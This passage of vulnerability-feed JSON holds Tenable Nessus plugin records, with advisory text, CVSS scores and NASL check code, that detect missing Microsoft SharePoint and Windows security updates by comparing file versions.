(CVE-2020-16945,\n CVE-2020-16946)", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2019 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/141419", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141419);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16950\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486676\");\n script_xref(name:\"MSFT\", value:\"MS20-4486676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2019 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2019 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2019 installation on the\nremote host is missing security updates. 
It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. 
The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. 
(CVE-2020-16945,\n CVE-2020-16946)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486676\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486676 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486676'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2019':\n { '0':\n {'Server':\n [{\n 'kb' : '4486676',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'ascalc.dll',\n 'version' : '16.0.10367.20000',\n 'product_name' : 'Microsoft SharePoint Server 2019'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if 
(check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486676') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-05T13:51:19", "description": "The Microsoft SharePoint Server 2013 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. 
The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft Excel software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the current user. If\n the current user is logged on with administrative user\n rights, an attacker could take control of the affected\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. 
An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. 
(CVE-2020-16944)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2013 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16929", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "href": "https://www.tenable.com/plugins/nessus/141425", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141425);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/04\");\n\n script_cve_id(\n \"CVE-2020-16929\",\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486687\");\n script_xref(name:\"MSKB\", value:\"4486694\");\n script_xref(name:\"MSFT\", value:\"MS20-4486687\");\n script_xref(name:\"MSFT\", value:\"MS20-4486694\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2013 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2013 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft 
SharePoint Server 2013 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. 
The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft Excel software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the current user. If\n the current user is logged on with administrative user\n rights, an attacker could take control of the affected\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. 
These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486694\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4486687\n -KB4486694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16929\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486687',\n '4486694'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2013':\n { '1':\n {'Foundation':\n [{\n 'kb' : '4486694',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' 
: 'microsoft shared\\\\web server extensions\\\\15\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n }],\n 'Server':\n [{ \n 'kb' : '4486687',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'xlsrv.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if ( check['kb'] == '4486694' || \n check['kb'] == 'xx' || \n check['kb'] == 'xx' \n ) xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T10:36:55", "description": "The remote Windows host is missing security update 4530730\nor cumulative update 4530702. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530702.NASL", "href": "https://www.tenable.com/plugins/nessus/131930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131930);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530702\");\n script_xref(name:\"MSKB\", value:\"4530730\");\n script_xref(name:\"MSFT\", value:\"MS19-4530702\");\n script_xref(name:\"MSFT\", value:\"MS19-4530730\");\n\n script_name(english:\"KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530730\nor 
cumulative update 4530702. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
